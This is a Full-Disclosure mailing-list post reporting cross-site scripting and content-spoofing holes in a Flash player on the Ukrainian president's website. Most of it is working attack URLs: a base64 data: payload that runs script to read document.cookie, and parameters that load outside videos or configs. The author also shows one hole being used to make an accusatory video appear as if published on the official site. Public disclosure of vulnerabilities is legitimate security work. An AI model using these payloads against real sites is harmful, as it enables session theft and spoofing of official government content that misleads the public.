Multiple vulnerabilities at president.gov.ua

["MustLive" <mustlive () websecurity com ua>]

Hello participants of Mailing List.

For those who didn't read my posts in social networks last night and at my
web site, here is information about multiple vulnerabilities at
president.gov.ua. There are Cross-Site Scripting and Cross-Site Request
Forgery vulnerabilities.

In January 2007 I made "presidents fiesta" - published multiple
vulnerabilities at web sites of presidents of Ukraine, Russia, USA,
Byelorussia and Slovakia. And here are new holes at web site of new
president of Ukraine.

Cross-Site Scripting (WASC-08):

http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://president.gov.ua/js/jw/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Content Spoofing (WASC-12):

http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true

http://president.gov.ua/js/jw/player.swf?config=http://site/1.xml

http://president.gov.ua/js/jw/player.swf?abouttext=Player&aboutlink=http://websecurity.com.ua

Here is nice example of using one of these holes. The video is "published"
at president's web site, in which Victor Yanukovich told about his
corruption and criminal actions (on Ukrainian language).

http://president.gov.ua/js/jw/player.swf?file=http://mlfun.org.ua/video.flv&autostart=true

P.S.

Photos and videos of current protest events in Kyiv Ukraine see in Twitter
(including online video translation in my Twitter account).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/